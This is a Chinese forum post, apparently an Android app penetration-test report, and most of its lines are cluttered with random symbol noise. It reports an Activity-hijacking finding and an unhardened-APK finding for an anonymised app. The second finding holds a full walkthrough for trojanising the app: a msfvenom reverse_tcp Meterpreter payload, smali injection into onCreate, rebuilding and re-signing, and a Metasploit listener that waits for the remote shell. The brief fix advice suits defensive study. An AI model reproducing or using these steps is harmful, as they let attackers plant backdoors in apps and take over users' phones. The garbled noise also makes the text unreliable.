: [, P% Y2 b4 M4 U1 }; k; ]
- D9 M- R1 D& x6 {8 s
表1-2 测试结果
7 `% v( z9 K0 F8 X# g! P1 k* W2 i' g
8 s* V/ V* K8 B; D( k
$ Y$ [4 }2 @% ~5 A4 j2 @7 b+ V* t! `5 [& \- f% e
" v' t W% `# E- P( Z* K
4 S" O0 N& g! i4 p: l+ b
" j+ `) X9 }7 |6 Z2 j* P! x3 g9 g1 Y, a7 [
5 b2 @4 N K P' S/ j1 K8 G
8 P0 G/ b7 i( B% b3 K; y
# L& i q" `7 R8 K! u% u
. j. X" e" g6 m; N5 T 2 检测结果
i- Y2 Q# I" r. n6 ?* T( K, ?% d+ ?0 u9 j
9 t$ C6 H- P0 o# V- S
$ D& T1 b% M* h: O# ^ g/ [: u# i# g
* f* f* f# o d
+ q5 h; p6 ^; _: z" {+ n
2.1 某某某
2 O) Z$ A \7 a3 K8 m4 ?6 o1 D! {( w
% e. i: X" n, J' s) c' T- o
% v: G( p! o9 M, A! ~6 G
: f& ^ A# b: y# z; S% k* p4 o7 }/ @: E( a$ h6 P* p
2.1.1检测目标 ' r6 E# y. c( q8 y2 Y) v
9 o* A. x: v3 x& a$ c# C1 ^( j
X2 |+ A; Q7 {9 r. z% `% j. h1 S( g& u
6 J* @, o" K1 N4 V, K/ Q( C ?4 W
- Q/ r. r+ z& [2 W1 F6 l4 p0 g 目标地址: 某某某某某某APP
+ B5 S- U% L5 O8 f& c( W
( @6 E: r/ z0 V& F
: [- y, l7 i+ g" Y( T% j
; l' G6 j: b' P, Y4 n9 p* A
% H* m! R1 ]) p4 E0 T; ^
1 \* A$ g5 x' v' J3 ^. ^/ @/ l8 h" A 2.1.2检测结果
; V/ W' E7 E' P$ z4 I' \. p) l, J) v/ W) @. L2 _
A2 X3 Q J# Q2 x3 E+ ? v. s [4 j% o+ v
# h- t1 i: A7 X& M7 f0 ]
: x- D; ?/ R# N& i* j- D, u 2.1.2.1 / }/ R: H5 a9 d& j/ n$ o* ~1 X
- W& j% Z" t m) u5 K/ x
! A9 U3 y- o/ f7 ~: e% Q
9 `5 X2 ~. D, b, T; j- ] D8 N
& B5 _' e0 o8 e
& E- R* m/ e" N* b; B3 u% ? 漏洞链接地址:某某某某某某APP
1 \6 g3 U& b. B d$ K+ o$ ]: F7 R0 z8 L. N1 C) K$ I( @& w# w2 x4 ^
- u- j/ f' V+ M( ~; i0 ?- t$ l. V" i9 X! b }9 ]# o
& D4 e. z) _9 d
' l. t0 I" m, P
6 z. t7 _, [2 I8 r4 _& N x
d) [. ~0 I6 U* C z3 c5 b" T0 \
i9 w( a3 _& w6 K. {3 p) r* Q& v; ?4 {7 }) R
4 T0 w9 h1 ~- k0 }& k
; [0 F3 g+ p! U6 w' o 漏洞分析及取证:
7 \% }" j! z8 k$ x7 h( e- Q
Y; R, ^; D1 p7 M; F% ~7 g: l
+ z$ H4 U/ t% l; t. {- g
* y8 k/ D: e; W3 k 9 m+ U) C2 N# w9 W
C' ?& d+ w5 ]3 f
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
. k5 Y! _- ~1 `
1 u: L: g2 t6 g
4 Z9 o! l k, r' S; W
, O0 h% \) h' Z7 C% Q
0 s) a- k( P, Z( A: A+ q. M
- r9 l. a5 M& o6 k* j$ a$ g 
9 _% u+ ~) n7 S! o9 L1 \: \5 x [& t* H
6 I- Z. a& v+ }/ q) F1 x/ ~& h. u" @9 r, i
" t5 B0 I& u: b! Y8 w L- W& h8 K) Z
7 W) Z6 u- u1 q) K
7 o) e2 X- ^& e# c" A+ C6 ^8 d
/ L% R% V" J* V5 N+ J7 v' N
2 s8 N, O" |9 q- u( A& [1 W
- H1 k0 D, G' b- f, z5 o( j1 Z
8 d& W* @9 r' q& h. U3 Q% C# T/ _
! O9 O0 H6 q: b) D1 A 
/ D2 `# l$ j6 i: t
7 @0 L& j; t5 p0 r3 a
& J- u, \2 i. l' a% C: z
9 D8 m$ a6 I! ~6 I8 o , J, n/ J9 C( b7 Q% @
* w0 F5 }. _. U% i% h4 K( }9 D2 S; C
2 X+ q, h+ R2 {+ O# J* I
; G5 E/ u0 U2 I7 e
. s7 d+ u' V& m# v& Y
* \, T2 o& H) m& `8 D' H4 z6 J
; c1 d) X0 O4 ?; r$ }. n% H4 `! Y% H7 Y7 o5 p7 D* O5 q( O. u. E
. S" ^# j4 G& `1 @, Q% {( G# j) y8 o/ r: B" B# @7 P# L. _+ d$ p( ?- T
6 z1 Y H/ a; l/ W) t
$ H# o+ v5 _! p4 S6 ]
& L# Z/ u+ m9 Z/ }+ e8 N0 k/ n. y) Q! s
) U: I' |. j* @ 漏洞危害:高
8 \9 K7 p6 ^/ Z- V9 S: j0 s8 e0 c' e8 t- m& \
& y& ]; y, l* {) m1 C: H9 O
2 b( O6 @/ p4 H/ s- d
# ^/ u3 b2 }/ Z1 B+ J1 ]( b+ A) {0 e4 s) _; U* r
# a' L1 a/ y, b3 U
+ j1 |0 o$ ?) n% N/ u
& u8 F' G2 C( C' L9 e* K# {
" j; O+ P& t% d$ x
7 g- {3 _, p& h. F% U1 k
2 O. _, E9 I/ }$ d& r% m( s6 Z | 6 R: n1 r! k% B6 V+ z" B O
5 e- a# _! ?- k
0 F4 N1 [2 X- M) X2 o+ V4 C
& Q% n8 u% R+ \% j 严重程度 2 ?/ a; Q5 Y5 f' y# V
) k( I: d( |5 e( `5 K1 Q Z
1 g6 D9 |! f4 \, X1 g$ v
! L5 T5 h/ E3 |4 U |
5 A, u% f( d9 E. i2 F/ {
( g V/ L' K0 ^7 f5 C" n . X8 g, f# g: A4 l6 C
& t+ ~1 K9 N1 m: ]6 b% m4 w+ T
. p1 B7 B9 d+ U ^ s; S0 B. `& S6 w \1 R7 f
高 - A3 a* ^" {4 c5 l" ~; M6 X
+ Z# M$ c) w& O" s: v3 F/ {
]4 H; w/ w9 T1 U+ H+ c4 L. I8 d0 ?# ^: X, m' _' o3 ~3 l8 H. C
|
2 ?# |4 T6 {5 W3 c$ c. H
$ W3 H2 Y" | k2 ?6 z8 g* T
) X# C! F8 k4 L7 j3 ^$ Y6 T# ~
7 U5 }+ n5 m, r, g. R
6 W1 Q5 G2 Z' q' I0 w& Y
" Y4 i* S( U# U, A ■ / g8 j" Z; i. w2 ^: @5 A8 y& U
+ x0 I$ P! d2 V$ O7 C; s1 g
; J; |. s# s0 N- m# y# a/ Y
+ `/ b$ K: ^5 Z |
6 c" D [! Q/ L. W. _: H
! q' U8 e6 f: y / y6 w9 i& h8 z: Z6 V+ Z
5 G# s, N4 X, S1 h/ Q2 \
2 }$ Z, \4 t& D, w
, V& g; x$ U6 S4 c" B1 b 中 * j! i& U$ ?, g2 v/ `
9 ~9 Y$ S, ]2 e3 f
! N( g6 ^$ ?3 ^8 K& f# r
- _$ U# M" @6 s1 V! _$ r w | 0 x* y/ ?9 b. l+ O
% ]$ ]$ _- x: g/ ~: l
7 l, H1 J; A: c2 M, z3 S6 U+ v
2 F9 U% X5 O9 j/ I$ E; N, J8 x2 p, y 3 ^8 c! {7 f! l) [
3 i. a' n* x! H5 m6 q $ @& H) Z0 s; X+ A G
! G4 U+ N) P1 f q ?9 d. \4 |
7 f* ~& h/ d s6 b- K% l
d: r0 L9 e [/ l5 }8 r" ` |
; X, p$ H& k$ M/ K7 a' a3 C9 P
3 x1 I. V/ O: ~4 T |3 D
* j( ?. } a6 J, ?+ b
) W+ c ~9 l, `' Y `
7 ^! n5 _. E x3 p/ C 低 ( S& ^: K' c2 o) P0 K1 Q) P
' |. b/ {6 o8 U* x' _ . Q2 J: }% `" j, N- w5 j
9 L- ]. e j8 W! V5 n$ Q* F& C | ) n, y2 z7 h6 D5 X" b/ H8 X
" x) X) N: g r
% h3 k5 H# z# y" ^
- J9 n# D% I- p* A1 L 2 k! j( k$ @7 {) I
/ K5 o$ w( s; }1 H. K% Q, U) @
' J1 c! {3 c9 J( e# ?4 L( P3 {9 G/ B8 y+ C$ d: W7 S% V- o) P
4 |. P. h8 o# u& A* z% a1 K0 F! [& L, J' r: _
| 6 U9 y2 T1 y% n- @( Y8 n
$ G7 n1 C6 }& O7 l* R7 R3 w
7 g! Y2 G4 u7 m6 t2 _4 R1 ?" }' K4 q1 a) b/ v+ J
6 W: c* c( o- S7 x U# S6 p+ }# k& c& z4 k2 Q9 L
$ f& \; `3 J" N0 c
* `& {2 i! A. u# B% S2 ?8 b$ c + s5 d' n1 J& y8 ]! N: h
6 {5 a; U* R. j8 c# E
* y$ Z0 v" n4 A0 G- y9 G: y- ^
" J, E3 K6 g. R6 X& m/ D3 t
8 Y* x. X. e8 |. Z$ N& @1 [: m U+ O5 B" G! u6 B
6 j0 o3 s t; A3 p" |) h
4 Y Q/ Z$ ^" @3 v& ]5 c6 l
+ d6 ^6 F9 s" z3 s6 k" T/ H0 h5 y. \. p& z
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 8 }0 o% j+ w' R' z* |6 R- }! A" [
$ d2 q( I! I: y
. c1 a0 f6 x, E+ c% o
, V/ K" M, A" C$ s
7 j9 e0 ], H* y( \# s" K. y
1 d9 q9 ^: _" ]- F8 d
9 ]0 k7 d3 T" l" S: G- A4 P; o6 |# Y1 h) Z! O9 i; U
4 \+ ]6 E( Z! r5 L$ F8 z+ x3 g
" s: x, g4 b) d( o: E - q6 z! G2 C' z6 D6 N7 S7 ]# m* U
% Z; {' Y, M9 n. u
, O$ d5 b1 d& w6 Q6 h; q6 P# o; Y* K
$ z9 h$ _/ W! H1 Q8 O" F
( z" [" Z# u' [3 `5 f p7 K0 T- X' ^
0 L i; c$ C1 E) G: L, w; H& Q l- K2 W) n# j: ?9 S& v- P
2.1.2.2 " G! ~2 D C5 t3 d% B
* P; E* @! B f" H3 d
, D5 G, E) Z$ Q4 x
5 w3 o3 l$ u, i/ t) l
0 F5 A3 x9 c( c2 T) E* P
! u& C! y0 z f A3 d+ z
漏洞链接地址:某某某某某某APP ) {7 I$ }/ n1 f. s0 V5 n0 X) y
: @' \! }. v' N( V* m* I
) x2 D: t7 {9 D5 w8 `( A6 F( {6 {/ T
% M& z3 s$ h3 E; P: t& H
2 |. T5 H9 k7 {' J) e- K% I5 i7 h
漏洞分析及取证:
# X% D% O( B/ b2 d; h2 ]" |' n; J `% |
: V: `- u0 j7 w5 \
; h& p) T3 O# R' Z1 [' p0 J6 a1 u7 N
* i4 F! h5 E& r% C# h7 r( I D
2 O$ s0 x+ ?+ i' }: o6 e' n
; E, I0 i( |$ S- e 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ! h+ E7 i5 Z5 v) h
$ f5 h% M) `3 a( T- s( P& J& a6 y
; k/ ?# g4 G3 A8 ]1 V1 j# o% ]. u3 D
2 U( y$ A k; q& [ d; v& r : ^# F- h* }. p5 d9 B! |
+ Y( f7 {& J! l0 ?: G7 m+ A; s# I
用Metasploit 生成木马 apk
4 b8 o* N/ E) [( ^/ l y$ ^
8 Z+ m6 p, v9 t3 J! T
# W: Y6 C/ P# U2 @1 h/ [, M
3 v* L( d& c& x4 M2 u ; ?! h; c3 g" e
; d. t5 M' j' F: Z msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 `$ v9 c% N" w% K) h" ?3 c
5 v9 L$ s F7 Y) D! Q
7 j; V9 K; }" e) `
5 ^) f u P0 H6 z6 W, B
. O4 ]) n- i1 v# C0 X8 ~
8 W6 S' W: |" m% m+ z8 `' E
反编译目标apk和木马apk
: `+ N u4 O. c6 x2 x
. P: v/ e! T) h* O0 j" x& e0 t3 f
# B" F" [; A. k) a5 o0 }5 N. v( ]+ Z8 s" U x4 l
f. x6 |$ ?( Q( v9 n, N
& h% E! S" b$ h apktool d target.apk
- \3 E8 b5 g2 r! ?
9 f2 @& j% N2 ^4 P1 \8 O E apktool d cockhorse.apk
1 P" R! X3 I& \
+ u6 J# X) M" O0 S
8 F4 n- ], A& M9 i' I3 f$ o9 K, q6 c( g8 P. e6 g
! B" R8 p+ N' S1 ^9 }; A
Q5 O& ]/ S- q0 V 木马 apk 注入目标 apk 9 \! C( q2 b: r! e3 ?5 P# A. S
" t5 P' o& I. Z. g6 x
5 V% D6 r7 ^- C$ h. S2 h
3 F" ]/ Y6 p5 T( H3 ]8 f & x3 V4 n. W$ h6 o) T7 x
5 J4 }$ s. _- k) g
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
# W5 f! j5 I/ G6 l8 d
; O. C2 X5 F- k* \ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
9 t' l$ y! ]* t( Y2 r. S& E
r/ t1 U9 B( ^; x
/ j) K5 z& n" _3 c
; k" K* V1 h( d' n% c/ f: s( s
g& A2 D0 Q, n/ u7 a) ~- h% ?
) p8 t. |, O+ H, [ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
5 _5 C, A. v' Y1 k8 N5 i9 [7 X8 J% Y% o$ }* M: Y
& w* n, A. V* P% e, M' u2 H' G1 ~
% Q# B6 X. k) a1 s) ^5 }( e
* b3 M( N9 l; t' Y9 c" P
7 j9 {5 n+ Y Y* ? [, n9 a/ k 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 + y& f8 z) O, ?
d: x% l% \& y
" q4 p# H$ B7 T9 H6 o( v9 R5 t
. f4 i( X. N# c
+ K' |& K9 b' `, L
5 d+ I5 Z' i3 Z' k! G+ b6 A 回编译生成最终 apk 1 C" L/ C5 r- c5 c" Z4 t
; F& Z/ O/ V4 Z, h k6 Q
- e4 i* X& J" s7 \0 |, _" O
) g. P. T& g+ I/ i% I
6 y7 E" m* Y0 X5 O3 l. |* h5 \, `: g! r) A! t' T. x v
重新打包
8 ~4 O& {2 \8 V5 h4 z5 t
; ~( G$ T! ~/ ]4 l7 W+ z
2 y. j4 B. |$ Y( T: B& R: f
5 S8 e7 I& _6 V- a2 x
7 h* u/ P: A3 T
5 H+ G& B8 e2 u/ _* p( X apktool b -o repackage.apk target_app_floder ) m- F5 d Y# }/ q+ j+ `- e" d
# s' P6 N2 z( h* n7 u* x
; T7 o: X) o( K
( g2 ?6 ^7 A# M- I+ `6 R
% |" d" y. a3 v& `
' N, \# O% Y3 A9 f% u- s9 c/ z) g 创建签名文件,有的话可忽略此步骤 / Q" W$ H# O$ I8 M }
# ]" ~6 e: J# J+ S0 J
" `: j, }) e w @- {+ n( L1 Y* J( @3 }* p2 c2 r
8 h7 M" ?3 g, S. g/ G- S* t) i) ?; R& T
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 4 b- n1 n7 a3 B1 Z" @
+ ^9 N! ^4 R c; H9 r$ f8 p
1 O; R% ~( f) h
& q+ k5 y4 F9 Q; w( k- T$ n : A6 b: M& o* N+ ~
: @( Z+ B$ V3 f5 q5 C! ^ 签名,以下任选其一 . B. q( A5 O. l" _5 B3 H, |
4 ?( w2 B' [9 z
! Q! c, Z+ R% j2 Q. ]3 l# R: q) d
0 E- T) o. G% e+ d7 h P# f' A # b% d6 k* o3 ^* l2 J3 c
! |0 @- Z6 v% L- w jarsigner 方式 : c: H9 b$ l# A+ p1 K, b: D+ R
+ G' g( C1 s9 E+ t0 ?6 |7 D) Z
1 G; V. G3 `! u/ b, O+ B: Y' b+ D# h, p+ Y, P2 U9 W e
: x, ~3 O# [) I, J& w; f" A5 l1 y
2 J2 q: }/ e$ M0 m0 X jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " r% }: C! t5 p6 I- S8 f( L
0 Z& Q$ Q0 A6 V2 O
9 }/ z- {1 \* Z* C3 _ U: d1 G+ I& X) I2 ~
5 M E" h2 _, z1 Q4 k O2 W9 `" z; H# D3 F
apksigner 方式
! K# e* Z& l0 b" Q1 M" W7 X3 o, ?
3 k& c# z$ O3 @3 [( G0 ^
0 T, K8 M' Q( D
& P# Z H2 i$ M. l' V) v/ n ) o2 n* \ X) g
' D5 T1 k) M5 z5 I
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
$ A' k( t+ O. g1 i1 X2 g5 h' O* }( T
" N5 w* M5 B! _' n: s4 R! `" n% e3 i
$ J9 L; f* j1 R5 y8 W2 z, U* h- V6 W3 m0 K& {$ n& {6 s- ?' n
. I [& a" `: }
; l3 P. D1 p* W 如需要禁用 v2签名 添加选项--v2-signing-enabled false 8 z7 |: ?4 @# C( O n5 V9 j6 K
- R9 \8 G G8 f
+ y4 d S; z7 A
6 ?7 G) x. c8 Q& W9 h 3 k# U- G/ ^8 x; @6 i ?' L
* V! U V4 Y( o' J1 J; V4 x 验证,以下任选其一
+ O1 k1 u9 m2 w. V6 ^# m( h. r, x% w# C
% r: J: d# @6 ^4 A. [/ |) t+ |" a9 V* |
. _/ ?4 q; P2 u! Q& y: V/ v" K1 l
, d! }' y3 t& i: m
jarsigner方式 7 v, G+ p; E& p5 Y
3 p. v: H z' k
, I' }. _- o, [2 A
( I0 u) I! p& p
" D' n& R$ @, c! Q5 N( U$ ^
3 o3 w2 q. L8 j$ `; E z jarsigner -verify repackaged.apk , ?4 v- T) u/ P6 h; {7 W
5 E. ?1 `6 ?# F4 K: n
0 P' r3 S2 R* V: h$ f5 u1 c
2 u2 g/ d/ ^" Y' T d% r
; V+ w8 E- P9 P; I+ \1 d% a9 b
2 w! V2 M) C. e M/ w1 h8 y
apksigner 方式
2 Y" D) X2 [& e/ D5 E/ L! {- Q
. }3 t; i7 I6 {: a$ V
7 k' k* E1 e, J! A, |5 d2 _* F4 U
6 ^- T( _% f2 j1 X b4 W$ \4 N" Q* I/ ?; ^
apksigner verify -v --print-certs repackaged.apk % { A1 z. N+ A Y3 x {; [0 ^% o
2 a9 J- D7 d x" P+ M' ~1 R, h' ?8 N
8 w: t; x" l, F% H( e8 p
! q' H: I# _5 O , F k4 w0 G9 s. S5 R- w
9 |- J* D- b$ Y: @4 p( y) T keytool方式 - v/ ] M( E/ U8 ]3 a
+ \: X, u+ X" W4 \6 U: U+ i# g
9 f3 [* r- i. E* L9 o! p" E
$ _& B; W# A5 O2 Q# } O. H5 R
1 Q6 n* ]6 s% ?; ^! ^
. f7 o) f7 g$ `) T+ i6 D1 @ keytool -printcert -jarfile repackaged.apk
4 s- O7 N# r% H1 r. `7 ^: B+ Z8 d- ~. }/ ~* n8 N9 ]' F1 [& C
$ o" l' s, y- d
$ j" t7 \( s- e& D! V 6 p4 Z0 C7 a1 J6 g' l& @+ j, L1 a# k) O
8 d3 }: e. i' q: M6 l: ^ 对齐 ( G7 z6 W' R6 S" c/ I
2 V/ |% }4 B) z' V2 f
" {; A* E2 o$ j& ?4 ~% K+ g
4 y1 k0 b5 m) i4 p- `9 c5 N
7 d1 u* K, ]6 B& a6 C4 o; B4 }0 D
字节对齐优化 8 D3 K k8 i% N2 H/ l! Q; f$ K* Y
Z. y- k" m6 P( o) P
3 J5 I5 y4 F: u6 j% y8 D* o/ t7 L3 |
% m" X# M, c8 U- A
+ D% }* \3 r3 J" Y7 l( a- c# f, `8 U" G$ ?9 S! E8 U+ X
zipalign -v 4 repackaged.apk final.apk
% l+ l) k5 P! w# g8 n5 @1 Q+ Z9 p3 y! L6 a( h( D) q, h) M
/ K% N- _) k7 g2 y& W
" x( a( o1 e, _/ e
, h/ b& J8 }2 g* w; B
3 e' U P0 ~* D9 `/ `0 F
检查是否对齐 8 q9 i+ Q1 d2 C! w- @: ~, B1 a
4 n, T: Q7 R$ Q$ P9 _8 ]8 X% q! `
% ^* w+ N8 I: |3 X: W' l ^' h
, ]- J! C: L( ^& T2 b! L' |8 Y; S4 I ) J8 x4 E1 _- x$ w
! l- D, M" o) g; F1 h zipalign -c -v 4 final.apk
+ u6 ]5 t3 u/ g3 M6 ^* k3 k+ }6 U3 u: x1 L
# _7 @" i7 ] Z& _- s n1 ?4 q
8 m' {" W7 R1 R
3 L" a( r2 ?# Z: h7 y4 f+ m9 e6 x. A
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 * B$ C3 J! F+ n! x Q1 W* }
) n# N/ D5 U% O/ q7 H% J. ]
N: G4 K" T2 _* p- X4 ^' J; N
0 y* x7 {) J; W; k; K- i
% j$ i+ N* o! l: S z0 t) x
6 ], v8 Q8 _! u. }- ?9 n' w 启动Metasploit控制台,配置参数等待上线
9 V! @6 E3 ?6 I# {% }( m" _2 e6 {4 w: t/ Y! {. |' Q/ X8 S$ M; h" t. u
M2 s2 l/ F8 d; u/ W+ w9 m* K0 }
& I5 _! z) i/ c& p/ @
( l3 ?8 T! H* S3 t* Y
0 F4 C- H$ W; H+ T# U4 g) `4 ? 在终端依次输入如下命令
7 B# `1 D: X0 O% i% i$ x& }7 F. P ^# f- Y: w8 B
+ w$ f$ M Q. T% g4 v1 [ x1 J
( q/ A7 B! G9 I) f5 f( {
3 n9 ^. V7 Z# \: v0 Z/ L5 P, {9 L% j/ j
msfconsole
1 V3 N: f/ d0 H7 q
' V8 {5 D$ N( G+ @/ {
X% z6 A5 e% I
5 l( N" y9 t2 j5 U9 ?: m
0 c& P. F7 K# B# C7 ?/ w
# l$ f: H9 m+ S6 |# Z use exploit/multi/handler # r: u/ |2 f4 r6 a/ y
9 n# F6 n Z) t
7 n; u( ?5 o/ n3 f6 O0 n) d1 v1 Z3 e F9 b2 r8 a
+ l4 X3 P; J9 m$ Q; W1 N6 D) ^2 Q3 Q8 |/ n) f* a9 s
set PAYLOAD android/meterpreter/reverse_tcp 6 z. Z" H. \; S1 O" O+ s
. k9 d/ A+ M& D. A
! O% [( g% S3 B# ^* T
0 o! y+ u1 v* `* | , Z+ B( ~+ ~& C/ Y6 \
; Q7 J1 }0 i ^$ P# h& W set LHOST 192.xxx.xx.xx p+ Q9 ~: p- y2 e# N5 f
, J4 B( }+ B3 E: v# w, @+ M, ~
" H- _5 V- R2 `* | y+ A0 B
9 Y6 M. Q3 l6 X- e, J5 }3 _+ f
2 Z# ^6 D* l' {0 g9 o6 ]8 W: _. d# z9 _- o% x$ Y, z
set LPORT 4444
4 U* H0 ~6 ?3 u3 u+ `9 G
; X& z% n y' l3 N8 y1 Y# [
x& B- I! w1 E$ s% M! f, `
3 A# o/ K% o4 |& O + k8 ^& E1 u4 ^- n
' I {/ [2 F9 t# }
exploit ; _' P8 M7 ~+ ~4 _ d
! A, y1 r% m/ t2 k! T3 Z
3 c/ Q6 ~" s: g \5 T$ d) q
! Z' ~; D! e7 ?8 O
' x5 P+ r# j0 H/ L7 c# N
) c3 ^! ~! L: U" w" _0 e0 F 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
+ o$ e0 \8 n0 h& n
& D& T3 k! u) _: y( A% K* B
9 D$ ^* ]+ m Q+ D5 Y( O; L
. b/ b3 G. p7 @) j 9 O" l! e3 |: }. `
) p7 ?+ v) k( g" r4 O6 u0 @) g
漏洞危害:中 5 S' f: R0 V( s/ e1 p
- @& S3 p- L# J! L, E
2 n+ C; [5 p" a
L0 N0 ]" h8 \. j! K- f) j1 F. R
# f( w k( [4 g' e5 E) }
$ {- l6 F$ O% x" Y' u0 p9 S" Z- u
( x# }+ v2 r) ]' j1 Y! A3 F. G8 ?8 ^
7 i+ T( ]+ I) |8 e" k* C2 z$ a9 A
; y: v% |& l. z& ?7 q. e; d
2 W! m& j ^9 ~0 A0 M( A
6 R; c5 G# t4 A! c$ ~ " x4 C0 M* c- X0 z2 y
; B B0 Z0 R( Z. S3 H# p# r |
; r1 B: m7 j# s$ y8 w" H$ X# d* {, V
0 c- b5 k$ f1 C# z2 P* H" c# I: D
9 t4 t5 C, w9 M& j2 ~; J
严重程度
9 n; _" V- u8 z8 g7 V s- ^) h1 \1 f$ ]; N/ V. {; z
2 U. g5 X# m. g! G) O5 g8 H0 G4 Q5 P
% c/ Z- h. D6 E H! B) h3 L8 [: L |
0 C9 m# k4 F5 t
: G( x, s$ r3 Y3 ~5 ?" \ 4 `& y& T, U2 p3 H4 ?! z
0 J o# _5 Y* R! R5 p) F' E- W, K$ h
s) D0 M. C1 d, ~4 j0 ^7 M7 V
7 O& Z' C4 @3 ]: D
高 ( h8 U6 m, i" }. M* s1 t8 a I
; n& l8 r; e' g4 n9 l2 v5 T
/ E/ I9 L4 z4 t
, f, K/ j4 E% x/ r. T" ^4 S |
7 D; ^4 R' ~$ R! v/ u k
7 A9 @% f# I+ D
: ~# h# q; @- s0 e+ m' R( C6 M# u& B: M/ z5 e
" k8 i2 S% n* C' P- N
* k3 D4 u; p/ C) y% ` ■
) A& W: a/ Z5 Y/ Q" ?3 v/ Q
, @( d( X$ @7 J( M 0 Z ^' x4 Z. N" x
7 S$ W9 T% L: |- E8 [" C' K7 z | 0 Q; F+ ~* ]' f0 R
6 x( d3 f* N r X2 d9 I* A
+ w/ M7 p2 L6 y/ K% g' w: H: Y
$ L! \, N) u6 E9 B. O
: d, r' `4 y% O" j& r- q
7 y1 F& I. e! W 中
% C0 s4 o9 I# Y4 {
8 G2 n7 u7 z1 v O# Z$ | ; W1 _( q' \+ ?* R# ^, ?
; s& s4 W3 t% O$ C# |
| 2 X$ }4 \ ~# d% U; q
6 R' q3 j% `; J! A, P+ o1 M; n 5 T7 U5 k5 J& b
% v% T" n* H; t( A8 }6 t N9 T
. V$ {; O4 H8 ~% s7 ?
9 ^. E* a9 c$ N3 \
/ g& _% s' F" @" h9 [/ ~9 m
6 d( X: ^4 Y9 K) o+ T % ~' T! z0 c/ H/ @( h. j% O7 Q
; y; ?# S8 T% d' i' S; c 7 Q9 u6 k e3 c# I
; ~9 {# A/ j; c7 \9 O+ ^
|
5 M+ W) g7 ], [
! q, W5 W) T+ w4 I9 h3 l 4 t0 X5 A2 D9 ^
9 x" d; Z G. L 4 x# {8 t$ q: i; @( z" T! b; {
2 c @2 H `; }9 ^+ G" o 低
' m* p* J6 N- @# n' O3 t ^% b
: L; E' q; I0 P * }0 F, k! X! j ~0 `
' E- x) X6 y; E/ T& Y; m) V! {) F8 u/ @ | " |- T& S5 C5 S: {" j8 e
3 e5 R7 v. F+ a7 K0 u5 W, ?( t: L
2 ]) H& |1 M0 s( L$ Y' L+ O9 t3 g) ~; `. Q# U: s, g
* \% @3 K0 l# J$ E* l X5 C& F' r) I, `$ x8 P2 p2 H
d; s/ w9 P( t9 h3 b
8 _3 {: J2 d& C' @; ~* h
% }8 M, B. ~9 G& B- u9 p/ Y/ m
$ ~$ p" j- ~ U- A; H
% }1 j- P5 k# ~; C8 m+ ]1 U G | ' ]& t- D4 S; X3 g, s
7 d* T% _! w4 N- ~
8 @( ]! B, [9 |+ x! E2 c7 F0 _) M
$ p! l# \( v' q9 ?+ E5 N% c
. w' g$ P( `9 C0 U: M6 e, d1 P1 b+ g; }& ~
* T/ J# s( B, K( ~
d+ z# i* B2 D
0 m3 d# F7 }* d2 f1 x- h* _: [
a" q5 B9 E3 A* v( p
4 L6 e2 `3 z* Z' H
4 k5 g* X- x( |+ m+ h5 ~2 z, K 3 W2 S. v+ q; Z. c8 r2 F, ]
; [% _; \" f& B# k9 A0 o$ s
1 ]: \+ h5 d+ V
- i/ ^! B; ` a8 W+ r( ^. j
0 N0 r+ d, D. R
6 {8 G7 ]# e. b4 J* Y 修复方法: * L7 i* w0 s8 n; I
9 G! X. ^$ U, _! N
2 i$ ]$ K6 ^: u: H# q# M) ^. S. e4 b' y* e8 h
' y, A$ k; q7 b0 v* l3 O
2 x7 u- _1 `9 h- i 1.在 APP 启动时应做签名校验防止二次打包。
) @0 l7 ~/ t0 v# z8 v6 s. J. i7 n3 u% |
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
, q, e, L+ ~2 _& u9 i! }, l' \% h, M' d2 {' B3 ~5 d8 `8 z
# K H$ T* O' n" A h! g7 j( Z" |; K7 `
2 S5 w' x% x r
9 O0 t3 o/ U4 Z# i1 p; q 6 r( |) a c5 g# y/ B; @
$ ?" j7 j( W/ O! f
0 K7 I% e' y7 E P5 \2 u! I* }( F- K$ d. d. _( o/ K
& h% U/ ?2 r8 ]" `) M+ F
8 A0 ^) o" y; {! [ ^
8 {4 U6 n. [- q5 y5 Z# @% d. j" o
5 J3 l: l) S% L5 Y6 h6 g
/ Q X8 t9 u& {
* O- w; {* q' W/ W7 X0 ]- Q
) g1 M0 d8 t: l: K4 k& B% D( r4 a0 y1 T0 V. |
3 L) n! ]/ ]; |- a, v3 r
. u+ |$ I9 b0 x9 l 
发表于 2022-6-8 20:32:44
收藏
支持
反对